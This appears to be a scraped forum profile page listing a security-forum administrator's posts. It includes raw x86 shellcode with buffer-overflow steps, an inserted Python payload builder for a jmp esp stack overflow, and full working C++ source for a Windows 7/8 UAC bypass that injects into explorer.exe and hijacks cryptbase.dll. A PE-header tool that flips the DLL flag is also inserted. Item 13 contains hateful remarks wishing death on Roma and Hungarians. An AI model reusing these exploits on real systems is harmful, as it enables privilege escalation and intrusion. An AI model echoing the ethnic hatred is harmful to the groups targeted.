
Nytro
Administrators
  • Posts: 18736
  • Days Won: 711

Everything posted by Nytro

  1. Pay attention to a few things:

     1. Very important:

        buffer += ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52 \x1c\x8b\x42""\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\ x89\xc7\x03" "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\ x31\xed\x8b" "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\ xf2\x81\x7e" "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\ x66\x8b\x2c" "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\ x68\x79\x74" "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\ x89\xe1\xfe" "\x49\x0b\x31\xc0\x51\x50\xff\xd7")

        I don't know if you noticed, but the crappy BB code throws in some random spaces! Remove them before running the exploit.

     2. Disable the protections: disable Stack Cookies, ASLR and DEP in the project settings.

     3. Watch out for local variables: if you declare a few local variables in the function that calls strcpy, more data ends up on the stack. So when you do the overwrite, instead of "\x41" * 24 you will have more to overwrite (a number larger than 24: maybe 28, maybe 32, maybe much more).

     4. strcpy_s: Visual Studio generates a warning if you use strcpy and recommends strcpy_s instead. Do NOT use strcpy_s in the tests, because it will prevent the buffer overflow.
  2. Note that you have ASLR on Windows 7/8. Do NOT reboot after you find the address for jmp esp. Run it step by step in the debugger and watch what happens at RETN; look at what is on top of the stack at RETN. PS: Your stack looks completely different. You have a lot more data on the stack, something the compiler put there. Put more AAAAs. Your ESP is xxxxF738 and the AAAAs are at xxxxF788, so there is more space to overwrite. I'll have a look on Win7 tomorrow too, I'm off for a beer now.
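     The two replies above ask the reader to do three things by hand: strip the spaces the BB-code renderer injected into the shellcode string, work out how many bytes sit between the start of the buffer and the saved return address (24, 28, 32 or more, depending on the locals the compiler placed in the frame), and then lay out padding + jmp esp address + shellcode. The block below is an added example that does those steps in code; it is not code from the thread. The sample shellcode text is a short constructed fragment with the same kind of mangling, and the offset and jmp esp address passed in are illustrative values, not taken from any real binary.

```python
"""Payload helper for a classic strcpy / jmp esp stack overflow lab.

Added example, not code from the original thread. Everything numeric here
(offset, gadget address) is a placeholder the reader replaces with the values
found in their own debugger session.
"""
import re
import string
import struct

# Matches one "\xNN" escape even if a forum renderer inserted whitespace
# after the backslash or after the 'x' (e.g. '\ x89' or '\x 89').
_ESCAPE = re.compile(r"\\\s*x\s*([0-9a-fA-F]{2})")

# Constructed sample of a BB-code-mangled shellcode string (not the real payload).
SAMPLE_BB_TEXT = r'"\x31\xd2\xb2 \x30\ x64\x8b""\x12"'


def clean_bb_shellcode(text: str) -> bytes:
    """Convert a C/Python-style '\\x..' string to bytes, ignoring the quotes
    and stray whitespace a forum renderer may have added between escapes."""
    body = text.replace('"', "").replace("'", "")
    hexpairs = _ESCAPE.findall(body)
    # Whatever remains after removing every escape must be whitespace only;
    # anything else means an escape was mangled beyond what we can repair.
    leftover = _ESCAPE.sub("", body).strip()
    if leftover:
        raise ValueError(f"unparsable fragment in shellcode text: {leftover!r}")
    return bytes(int(h, 16) for h in hexpairs)


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...) used to measure the
    offset to EIP instead of guessing 24 / 28 / 32."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_value: int, length: int = 20280) -> int:
    """Given the EIP value seen in the debugger after the crash, return the
    byte offset into the pattern, i.e. the distance to the saved return address."""
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


def build_payload(offset: int, jmp_esp_addr: int, shellcode: bytes, nop_sled: int = 16) -> bytes:
    """Padding up to the saved EIP, then the address of a 'jmp esp' gadget,
    then a short NOP sled and the shellcode. After RETN pops the gadget address
    ESP points just past it, so 'jmp esp' lands on the sled."""
    if offset < 0:
        raise ValueError("offset must be >= 0")
    payload = b"A" * offset + struct.pack("<I", jmp_esp_addr) + b"\x90" * nop_sled + shellcode
    # strcpy stops at the first NUL byte, so a NUL anywhere truncates the copy.
    nul = payload.find(b"\x00")
    if nul != -1:
        raise ValueError(f"payload contains a NUL byte at index {nul}; strcpy would stop there")
    return payload


if __name__ == "__main__":
    sc = clean_bb_shellcode(SAMPLE_BB_TEXT)
    # 0x41316141 is what EIP would show if the pattern bytes "Aa1A" landed in it.
    off = pattern_offset(0x41316141)
    print(f"{len(sc)} shellcode bytes, offset to EIP = {off}")
    print(build_payload(24, 0x7C9D30D7, sc).hex())  # 0x7C9D30D7: placeholder gadget address
```

     Remember from the reply above that the gadget address survives only until the next reboot when ASLR is on, so re-run the search for jmp esp rather than hardcoding the value across sessions.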
  3. Two. Or a million. It depends. A 10 MB application may contain 9 MB of images. It may contain 6 MB of debug information. It may contain 5 DLLs it uses, totalling 8 MB. It may be statically linked, i.e. it also contains the code of the libraries it uses. We can give you some rough statistics if you give us the executable. We can check how big the code section is. BUT it depends on too many things. If it's .NET, that's a different story. If it's VB, a different story. If it's C++, it may contain a lot of runtime code generated automatically by the compiler. Post the executable here.
  4. Thanks. I'm waiting to see at least one person who tried it and succeeded. Or who didn't succeed but whom I can help...
  5. Penetration Testing and Exploiting with Metasploit + Armitage + msfconsole
     Published on Jul 28, 2013. In this video we show you how to exploit machines with Metasploit, Armitage, and msfconsole. Thumbs up & Subscribe if you like it. Links: Facebook: http://www.facebook.com/Netsecnow Blog: Learn Network Security - NetSecNow Twitter: http://www.twitter.com/LearnNetSec Metasploit Guide: http://www.offensive-security.com/met...
  6. Basics of Penetration Testing by KernelMeltdown.org
     Published on Oct 28, 2012. Kernel Meltdown: I recorded my workshop last Thursday on this talk, but not surprisingly, the recording did not save! I decided to do the talk and demo again on my own and record it for everyone to enjoy... I did not anticipate it to be over 40 minutes, so I apologize for that, but here you go! Feedback is greatly appreciated. Otherwise, I would not know what to change to make them better. You can get the PowerPoint presentation here: http://kernelmeltdown.org/blog/offens...
  7. Ebooks

     Index of /

     Name                        Last modified      Size
     Cryptography/               24-Jan-2014 17:49  -
     Embedded/                   18-Mar-2014 00:59  -
     Forensic/                   18-Mar-2014 01:00  -
     Lockpicking/                18-Mar-2014 01:01  -
     Magazines/                  13-Jun-2014 13:47  -
     Network n Security/         18-Mar-2014 01:01  -
     Other/                      30-Jul-2014 17:38  -
     Programming/                03-Jun-2014 11:40  -
     Reverse Engineering/        06-May-2014 16:20  -
     The_Hacker_Files_Comic.zip  08-Dec-2013 11:36  111M
     Todo/                       18-Mar-2014 01:01  -
     Tools/                      26-May-2014 17:58  -
     Windows/                    18-Mar-2014 01:02  -
     Wordlists/                  24-Jan-2014 18:02  -
     bootnets/                   18-Mar-2014 01:02  -
     ebooks/                     21-Jul-2014 18:24  -
     expl0it/                    24-Jan-2014 17:56  -
     neuromancer.txt             08-Dec-2013 11:36  532K
     unix/                       18-Mar-2014 01:02  -

     Link: Index of /
  8. A dye pack is a radio-controlled incendiary device used by some banks to preemptively foil a bank robbery by causing stolen cash to be permanently marked with dye shortly after a robbery. In most cases, a dye pack is placed in a hollowed-out space within a stack of banknotes, usually $10 or $20 bills. This stack of bills looks and feels similar to a real one, with technology allowing for the manufacturing of flexible dye packs which are difficult to detect by handling the stack.[1] When the marked stack of bills is not used, it is stored next to a magnetic plate near a bank cashier, in standby or safe mode, ready to be handed over to a potential robber by a bank employee. When it is removed from the magnetic plate, the pack is armed, and once it leaves the building and passes through the door frame, a radio transmitter located at the door will trigger a timer (typically 10 seconds), after which the dye pack will explode and release an aerosol (usually of Disperse Red 9) and sometimes tear gas, intended to permanently stain and destroy the stolen money and mark the robber's body with a bright red color. The chemical reaction causing the explosion of the pack and the release of the dye creates high temperatures of about 200 °C (392 °F) which further discourages a criminal from touching the pack or removing it from the bag or getaway vehicle.[1] Dye packs are used in over 75% of banks in America.[2]
  9. CV-uri (CVs)
     They're CVs. Note: Adobe Reader crashes on me under EMET 5. Does the same happen to you? Edit: It was on my end.
  10. [C/C++] UAC Bypass (posted by mh4x0f)

    /*
    UAC Bypass for Windows 7 RTM, SP1 / Windows 8 DP, CP all 32-bit
    for admin with default UAC settings

    Effectively bypasses the UAC rights, because of:
    1. "auto-elevation" for certain processes started from explorer.exe
    2. anyone can inject anything to explorer.exe

    This was reported to Microsoft multiple times (months ago) and they are too lame to fix injection to explorer.exe.
    I've followed the responsible disclosure guidelines, no need to get angry on me.
    TDL4 is using the bypass for 64-bit already.

    © 2012 K. Kleissner, Published under EUPL - Take it, use it.

    Implement it as below, be aware the code makes a copy of itself (the "own" exe) and changes it to be a dll
    (so be aware of the WinMain -> DllMain entry point implications!).

    int UACBypass();

    int main()
    {
        OSVERSIONINFO VersionInfo;
        VersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
        GetVersionEx(&VersionInfo);

        // Windows 7, 8: Try injecting into auto-elevated process if admin and UAC is on default
        // (prompts 2 times on guest with credential UI so you should add a check for guest)
        if (VersionInfo.dwMajorVersion == 6 && (VersionInfo.dwMinorVersion == 1 || VersionInfo.dwMinorVersion == 2) && !IsUserElevatedAdmin())
            UACBypass();

        // ... your code here ...
    }

    BOOL IsUserElevatedAdmin()
    {
        SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
        PSID SecurityIdentifier;
        if (!AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &SecurityIdentifier))
            return 0;

        BOOL IsAdminMember;
        if (!CheckTokenMembership(NULL, SecurityIdentifier, &IsAdminMember))
            IsAdminMember = FALSE;

        FreeSid(SecurityIdentifier);
        return IsAdminMember;
    }
    */

    // WARNING: This code leaves cryptbase.dll in sysprep directory!
    // This is cleaned up and heavily modified code from originally http://www.pretentiousname.com/misc/win7_uac_whitelist2.html (Win7Elevate_Inject)

    #define _HAS_EXCEPTIONS 0
    #include <windows.h>
    #include <commctrl.h>
    #include <shlobj.h>
    #include <psapi.h>

    struct InjectArgs
    {
        // Functions
        BOOL (WINAPI *FFreeLibrary)(HMODULE hLibModule);
        HMODULE (WINAPI *FLoadLibrary)(LPCWSTR lpLibFileName);
        FARPROC (WINAPI *FGetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
        BOOL (WINAPI *FCloseHandle)(HANDLE);
        DWORD (WINAPI *FWaitForSingleObject)(HANDLE, DWORD);

        // Static strings
        wchar_t szSourceDll[MAX_PATH];
        wchar_t szElevDir[MAX_PATH];
        wchar_t szElevDll[MAX_PATH];
        wchar_t szElevDllFull[MAX_PATH];
        wchar_t szElevExeFull[MAX_PATH];
        wchar_t szElevArgs[MAX_PATH];
        wchar_t szEIFOMoniker[MAX_PATH]; // szElevatedIFileOperationMoniker

        // some GUIDs
        IID pIID_EIFO;
        IID pIID_ShellItem2;
        IID pIID_Unknown;

        // Dll and import strings
        wchar_t NameShell32[20];
        wchar_t NameOle32[20];
        char NameCoInitialize[20];
        char NameCoUninitialize[20];
        char NameCoGetObject[20];
        char NameCoCreateInstance[20];
        char NameSHCreateItemFromParsingName[30];
        char NameShellExecuteExW[20];

        // IMPORTANT: Allocating structures here (so we know where it was allocated)
        SHELLEXECUTEINFO shinfo;
        BIND_OPTS3 bo;
    };

    // important: error code here is passed back to original process (1 = success, 0 = failure)
    static DWORD WINAPI RemoteCodeFunc(InjectArgs * Args)
    {
        // don't rely on any static data here as this function is copied alone into remote process!
        // (we assume at least that kernel32 is at same address)
        NTSTATUS Status = 0;

        // Use an elevated FileOperation object to copy a file to a protected folder.
        // If we're in a process that can do silent COM elevation then we can do this without any prompts.
        HMODULE ModuleOle32 = Args->FLoadLibrary(Args->NameOle32);
        HMODULE ModuleShell32 = Args->FLoadLibrary(Args->NameShell32);
        if (!ModuleOle32 || !ModuleShell32)
            return 0;

        // Load the non-Kernel32.dll functions that we need.
        HRESULT (WINAPI * FCoInitialize)(LPVOID pvReserved) = (HRESULT (WINAPI * )(LPVOID pvReserved))Args->FGetProcAddress(ModuleOle32, Args->NameCoInitialize);
        void (WINAPI * FCoUninitialize)(void) = (void (WINAPI * )(void))Args->FGetProcAddress(ModuleOle32, Args->NameCoUninitialize);
        HRESULT (WINAPI * FCoGetObject)(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv) = (HRESULT (WINAPI * )(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv))Args->FGetProcAddress(ModuleOle32, Args->NameCoGetObject);
        HRESULT (WINAPI * FCoCreateInstance)(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, void ** ppv) = (HRESULT (WINAPI * )(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, void ** ppv))Args->FGetProcAddress(ModuleOle32, Args->NameCoCreateInstance);
        HRESULT (WINAPI * FSHCreateItemFromParsingName)(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv) = (HRESULT (WINAPI * )(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv))Args->FGetProcAddress(ModuleShell32, Args->NameSHCreateItemFromParsingName);
        BOOL (WINAPI * FShellExecuteEx)(LPSHELLEXECUTEINFOW lpExecInfo) = (BOOL (WINAPI * )(LPSHELLEXECUTEINFOW lpExecInfo))Args->FGetProcAddress(ModuleShell32, Args->NameShellExecuteExW);

        if (!FCoInitialize || !FCoUninitialize || !FCoGetObject || !FCoCreateInstance || !FSHCreateItemFromParsingName || !FShellExecuteEx || FCoInitialize(NULL) != S_OK)
            return 0;

        Args->bo.cbStruct = sizeof(BIND_OPTS3);
        Args->bo.dwClassContext = CLSCTX_LOCAL_SERVER;

        // For testing other COM objects/methods, start here.
        IFileOperation *pFileOp = 0;
        IShellItem *pSHISource = 0;
        IShellItem *pSHIDestination = 0;
        IShellItem *pSHIDelete = 0;

        // This is a completely standard call to IFileOperation, if you ignore all the pArgs/func-pointer indirection.
        if (FCoGetObject(Args->szEIFOMoniker, &Args->bo, Args->pIID_EIFO, reinterpret_cast< void ** >(&pFileOp)) == S_OK && pFileOp &&
            // FOF_NOERRORUI is important here to not show error messages, copying fails on guest (takes wrong path)
            pFileOp->SetOperationFlags(FOF_NOCONFIRMATION|FOF_SILENT|FOFX_SHOWELEVATIONPROMPT|FOFX_NOCOPYHOOKS|FOFX_REQUIREELEVATION|FOF_NOERRORUI) == S_OK &&
            FSHCreateItemFromParsingName(Args->szSourceDll, NULL, Args->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHISource)) == S_OK && pSHISource &&
            FSHCreateItemFromParsingName(Args->szElevDir, NULL, Args->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHIDestination)) == S_OK && pSHIDestination &&
            pFileOp->CopyItem(pSHISource, pSHIDestination, Args->szElevDll, NULL) == S_OK &&
            pFileOp->PerformOperations() == S_OK)
        {
            // Use ShellExecuteEx to launch the "part 2" target process. Again, a completely standard API call.
            // (Note: Don't use CreateProcess as it seems not to do the auto-elevation stuff.)
            Args->shinfo.cbSize = sizeof(SHELLEXECUTEINFO);
            Args->shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
            Args->shinfo.lpFile = Args->szElevExeFull;
            Args->shinfo.lpParameters = Args->szElevArgs;
            Args->shinfo.lpDirectory = Args->szElevDir;
            Args->shinfo.nShow = SW_SHOW;

            // update: we assume the cryptbase.dll deletes itself (no waiting for sysprep's execution although it would be possible)
            if ((Status = FShellExecuteEx(&Args->shinfo)))
            {
                Args->FCloseHandle(Args->shinfo.hProcess);
            }
        }

        // clean-up
        if (pSHIDelete) { pSHIDelete->Release(); }
        if (pSHIDestination) { pSHIDestination->Release(); }
        if (pSHISource) { pSHISource->Release(); }
        if (pFileOp) { pFileOp->Release(); }

        FCoUninitialize();
        Args->FFreeLibrary(ModuleShell32);
        Args->FFreeLibrary(ModuleOle32);

        return Status;
    }

    // returns 1 when you can expect everything worked fine!
    int AttemptOperation(bool bInject, HANDLE TargetProcess, const wchar_t *szPathToOurDll)
    {
        NTSTATUS Status = 0;
        const BYTE * codeStartAdr = (BYTE *)RemoteCodeFunc;
        const BYTE * codeEndAdr = (BYTE *)AttemptOperation;
        if (codeStartAdr >= codeEndAdr) // ensure we don't copy crap
            return 0;

        // Here we define the target process and DLL for "part 2." This is an auto/silent-elevating process which isn't
        // directly below System32 and which loads a DLL which is directly below System32 but isn't on the OS's "Known DLLs" list.
        // If we copy our own DLL with the same name to the exe's folder then the exe will load our DLL instead of the real one.

        // set up arguments
        InjectArgs ia;
        memset(&ia, 0, sizeof(ia));
        ia.FFreeLibrary = FreeLibrary;
        ia.FLoadLibrary = LoadLibrary;
        ia.FGetProcAddress = GetProcAddress;
        ia.FCloseHandle = CloseHandle;
        ia.FWaitForSingleObject = WaitForSingleObject;
        wcscpy(ia.NameShell32, L"shell32.dll");
        wcscpy(ia.NameOle32, L"ole32.dll");
        strcpy(ia.NameCoInitialize, "CoInitialize");
        strcpy(ia.NameCoUninitialize, "CoUninitialize");
        strcpy(ia.NameCoGetObject, "CoGetObject");
        strcpy(ia.NameCoCreateInstance, "CoCreateInstance");
        strcpy(ia.NameSHCreateItemFromParsingName, "SHCreateItemFromParsingName");
        strcpy(ia.NameShellExecuteExW, "ShellExecuteExW");

        wchar_t SystemDirectory[MAX_PATH];
        if (!GetSystemDirectory(SystemDirectory, MAX_PATH))
            return 0;

        wcscpy(ia.szSourceDll, szPathToOurDll);
        wcscpy(ia.szElevDir, SystemDirectory);
        wcscat(ia.szElevDir, L"\\sysprep");
        wcscpy(ia.szElevDll, L"CRYPTBASE.dll");
        wcscpy(ia.szElevExeFull, SystemDirectory);
        wcscat(ia.szElevExeFull, L"\\sysprep\\sysprep.exe");
        wcscpy(ia.szEIFOMoniker, L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}");

        memcpy(&ia.pIID_EIFO, &__uuidof(IFileOperation), sizeof(GUID));
        memcpy(&ia.pIID_ShellItem2, &__uuidof(IShellItem2), sizeof(GUID));
        memcpy(&ia.pIID_Unknown, &__uuidof(IUnknown), sizeof(GUID));

        if (!bInject)
        {
            // Test code without remoting.
            // This should result in a UAC prompt, if UAC is on at all and we haven't been launched as admin.
            Status = RemoteCodeFunc(&ia);
        }
        else
        {
            // Test code with remoting.
            // At least as of RC1 build 7100, with the default OS settings, this will run the specified command
            // with elevation but without triggering a UAC prompt.
            void * RemoteArgs = VirtualAllocEx(TargetProcess, 0, sizeof(ia), MEM_COMMIT, PAGE_READWRITE);
            if (!RemoteArgs || !WriteProcessMemory(TargetProcess, RemoteArgs, &ia, sizeof(ia), NULL))
                return 0;

            void * RemoteCode = VirtualAllocEx(TargetProcess, 0, codeEndAdr - codeStartAdr, MEM_COMMIT, PAGE_EXECUTE_READ);
            if (!RemoteCode || !WriteProcessMemory(TargetProcess, RemoteCode, RemoteCodeFunc, codeEndAdr - codeStartAdr, NULL))
                return 0;

            HANDLE hRemoteThread = CreateRemoteThread(TargetProcess, NULL, 0, (LPTHREAD_START_ROUTINE)RemoteCode, RemoteArgs, 0, NULL);
            if (!hRemoteThread)
                return 0;

            // intelligent logic to wait for the execution and grab the exit code
            DWORD dwWaitRes = WaitForSingleObject(hRemoteThread, 40000);
            if (dwWaitRes == WAIT_OBJECT_0)
                GetExitCodeThread(hRemoteThread, (DWORD *)&Status);

            CloseHandle(hRemoteThread);
        }

        return Status;
    }

    int UACBypass()
    {
        // Step 1: find explorer.exe process we can inject to (to-do: maybe using some other process?)
        DWORD Processes[1024], BytesReturned;
        if (!EnumProcesses(Processes, sizeof(Processes), &BytesReturned))
            return 0;

        HANDLE TargetProcess = NULL;
        for (unsigned i = 0; i < BytesReturned / 4; i++)
        {
            if (Processes[i] != 0)
            {
                TargetProcess = OpenProcess(/*PROCESS_QUERY_INFORMATION | PROCESS_VM_READ*/PROCESS_ALL_ACCESS, FALSE, Processes[i]);

                // Get the process name.
                if (TargetProcess)
                {
                    HMODULE hMod;
                    DWORD cbNeeded;
                    if (EnumProcessModules(TargetProcess, &hMod, sizeof(hMod), &cbNeeded))
                    {
                        wchar_t ProcessName[MAX_PATH];
                        GetModuleBaseName(TargetProcess, hMod, ProcessName, sizeof(ProcessName)/sizeof(TCHAR));
                        if (_wcsicmp(ProcessName, L"explorer.exe") == 0)
                            break;
                    }
                    CloseHandle(TargetProcess);
                    TargetProcess = NULL;
                }
            }
        }

        if (!TargetProcess)
            return 0;

        // Step 2: Creating fake cryptbase.dll that is this exe with the IMAGE_FILE_DLL flag set in PE header
        wchar_t SelfFileName[MAX_PATH];
        if (!GetModuleFileNameW(NULL, SelfFileName, MAX_PATH))
        {
            CloseHandle(TargetProcess);
            return 0;
        }

        wchar_t FakeCrytbase[MAX_PATH];
        GetTempPathW(MAX_PATH, FakeCrytbase);
        GetTempFileNameW(FakeCrytbase, L"tmp", 0, FakeCrytbase);
        if (!CopyFile(SelfFileName, FakeCrytbase, 0))
        {
            CloseHandle(TargetProcess);
            return 0;
        }

        HANDLE FakeFile = CreateFileW(FakeCrytbase, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
        if (FakeFile == INVALID_HANDLE_VALUE)
        {
            CloseHandle(TargetProcess);
            return 0;
        }

        DWORD NumberOfBytesRead;
        BYTE ImageHeader[4096];
        if (!ReadFile(FakeFile, ImageHeader, 4096, &NumberOfBytesRead, NULL))
        {
            CloseHandle(TargetProcess);
            CloseHandle(FakeFile);
            return 0;
        }

        PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)ImageHeader;
        PIMAGE_NT_HEADERS old_header = (PIMAGE_NT_HEADERS)&((const unsigned char *)(ImageHeader))[dos_header->e_lfanew];

        // set the dll flag (IMAGE_FILE_DLL)
        old_header->FileHeader.Characteristics |= IMAGE_FILE_DLL;

        DWORD NumberOfBytesWritten;
        if (SetFilePointer(FakeFile, 0, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER || !WriteFile(FakeFile, ImageHeader, 4096, &NumberOfBytesWritten, NULL))
        {
            CloseHandle(TargetProcess);
            CloseHandle(FakeFile);
            return 0;
        }
        CloseHandle(FakeFile);

        // Step 3: Using the exploit
        NTSTATUS Status = AttemptOperation(1, TargetProcess, FakeCrytbase);
        CloseHandle(TargetProcess);
        DeleteFile(FakeCrytbase);

        // exit if we can assume that the elevation worked correctly, and this executable was started with auto-elevated rights
        if (Status)
            ExitProcess(1);

        return 1;
    }

    Source: [C/C++] UAC Bypass - Source Codes - rohitab.com - Forums
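    Two posts above lean on the PE header without showing how to read it: the reply about executable size ("we can check how big the code section is") and step 2 of the UAC bypass listing, which copies the EXE and sets IMAGE_FILE_DLL in FileHeader.Characteristics so the loader treats it as a DLL. The block below is an added example, not code from either post: a small header reader that sums the code sections of an image and toggles the DLL flag exactly where the listing does (offset 22 of the PE header). The image it operates on is a hand-built PE skeleton, constructed inline for the demonstration; it is not a runnable program.

```python
"""Minimal PE (COFF) header reader: section sizes and the IMAGE_FILE_DLL flag.

Added example. Only the documented PE layout is assumed; the sample image at
the bottom is constructed by hand.
"""
import struct

IMAGE_FILE_DLL = 0x2000            # FileHeader.Characteristics bit the UAC listing sets
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
PE_SIGNATURE = b"PE\0\0"


def _pe_offset(data: bytes) -> int:
    """Follow e_lfanew from the DOS header to the 'PE\\0\\0' signature."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("PE signature not found at e_lfanew")
    return e_lfanew


def parse_sections(data: bytes):
    """Return (FileHeader.Characteristics, [(name, raw_size, virtual_size, flags), ...])."""
    pe = _pe_offset(data)
    # COFF header after the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4)
    # PointerToSymbolTable(4) NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    num_sections, opt_size, characteristics = struct.unpack_from("<H12xHH", data, pe + 6)
    table = pe + 24 + opt_size            # section table follows the optional header
    sections = []
    for i in range(num_sections):
        name, vsize, _vaddr, rsize, _rptr, _, _, _, _, flags = struct.unpack_from("<8sIIIIIIHHI", data, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), rsize, vsize, flags))
    return characteristics, sections


def code_share(data: bytes):
    """Bytes on disk that hold code vs. the whole file: the question behind '10 MB, how much is code?'."""
    _, sections = parse_sections(data)
    code = sum(rs for _, rs, _, fl in sections if fl & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE))
    return code, len(data)


def is_dll(data: bytes) -> bool:
    return bool(parse_sections(data)[0] & IMAGE_FILE_DLL)


def set_dll_flag(data: bytes, enable: bool = True) -> bytes:
    """The same edit the UAC listing makes in memory: flip IMAGE_FILE_DLL at PE+22."""
    pe = _pe_offset(data)
    buf = bytearray(data)
    (chars,) = struct.unpack_from("<H", buf, pe + 22)
    chars = (chars | IMAGE_FILE_DLL) if enable else (chars & ~IMAGE_FILE_DLL & 0xFFFF)
    struct.pack_into("<H", buf, pe + 22, chars)
    return bytes(buf)


def build_sample_image() -> bytes:
    """Constructed PE32 skeleton: DOS header, signature, COFF header, zeroed optional
    header, a 0x200-byte .text section of int3 and a 0x600-byte .rsrc section."""
    e_lfanew, opt_size = 0x40, 0xE0
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # i386, 2 sections, EXECUTABLE_IMAGE | 32BIT_MACHINE (no DLL flag)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)      # PE32 magic, rest zero
    raw_text, raw_rsrc = 0x200, 0x600
    hdr_end = e_lfanew + 4 + 20 + opt_size + 2 * 40
    text_ptr = (hdr_end + 0x1FF) & ~0x1FF                         # 0x200-byte file alignment
    rsrc_ptr = text_ptr + raw_text

    def sect(name, vsize, vaddr, rsize, rptr, flags):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rsize, rptr, 0, 0, 0, 0, flags)

    sections = sect(b".text", 0x1F0, 0x1000, raw_text, text_ptr, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | 0x40000000)
    sections += sect(b".rsrc", 0x5F0, 0x2000, raw_rsrc, rsrc_ptr, 0x00000040 | 0x40000000)
    headers = dos + PE_SIGNATURE + coff + opt + sections
    headers += b"\0" * (text_ptr - len(headers))
    return headers + b"\xCC" * raw_text + b"\0" * raw_rsrc


if __name__ == "__main__":
    img = build_sample_image()
    code, total = code_share(img)
    print(f"code bytes: {code} of {total} ({100 * code // total}%)")
    for name, rsize, vsize, flags in parse_sections(img)[1]:
        print(f"  {name:<8} raw={rsize:#x} virt={vsize:#x} flags={flags:#010x}")
    print("DLL flag:", is_dll(img), "->", is_dll(set_dll_flag(img)))
```

    On a real binary, open the file in binary mode and pass its bytes to `code_share` to answer the size question; the static-link and .NET/VB caveats from the reply still apply, since a .text section can contain a lot of runtime and a managed image keeps its IL outside what this counter sees.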
  11. OWASP Romania InfoSec Conference 2014 is a one day security and hacking conference. It will take place on 24th of October, 2014 - Bucharest, Romania. Why sponsor? Join 200+ leaders, security consultants, security architects and developers gathered to share cutting-edge ideas, initiatives and trends in technology. OWASP events attract an audience interested in "What's next?" - As a sponsor, you will be promoted as an answer to this question. Increase awareness and recognition in the Romanian Security IT environment. Support and involvement in the world of information security enthusiasts.
  12. Mugur Isarescu for president. Puie Monta!
  13. Hi, I understand your opinions and I fully agree with them: I piss on gypsies, Hungarians and homosexuals. BUT this is an IT security forum. Here we talk about computers. Maybe I too, many times, want to draw the world's attention to the gypsies, but I hold back because this is not the right place for such discussions. Also, I don't think there is anyone on the staff who likes these specimens. We all hate them, but holding discussions on the forum doesn't solve anything. This forum is for IT-related discussions, that's all. On another note, it's OK to open 2-3 topics on these matters, but I don't really see their point here. People come here (or at least they should) to see what's new in the field, to read a tutorial or to watch a video. I'm fed up with how many gypsies I see on the street or on TV, I don't want to see them on the forum too. I don't want to see on RST as well that the damn Hungarians want autonomy, because my pulse goes up wishing them dead and that's not good for my health. The conclusion is simple: stop posting such topics here. Then, regarding the language, it's OK to curse the Hungarians' and gypsies' dead and wounded, but it is NOT OK to do that to members. We don't mind the language, but we don't tolerate personal attacks. We all have moments when we get angry, but cursing out a moderator doesn't help us at all, maybe it just makes us feel better for 5 seconds. We understand you, I hope you understand us too.
  14. IBM SyNAPSE TrueNorth, the human brain in a silicon pill
      Dorian Prodan - 8 Aug 201

      Three years ago, IBM Research and Cornell University presented the first prototype of the Systems of Neuromorphic Adaptive Plastic Scalable Electronics (SyNAPSE) processor and its interesting internal architecture, which imitates the neural network of the human brain. Improved and made more efficient, the SyNAPSE processor has evolved, and the first finished product in this range is ready to enter production: TrueNorth.

      Artificial intelligence researchers have been experimenting for a very long time with ever more advanced software solutions, but the SyNAPSE developers consider that attacking this difficult problem with ordinary computing systems is inefficient. While today's computing systems offer raw processing capabilities that exceed the limits of the human brain, they are incapable of efficiently imitating the finesse of the neural interconnections that underlie independent thought and consciousness. Where today's processors fail, IBM Research and Cornell say SyNAPSE shines.

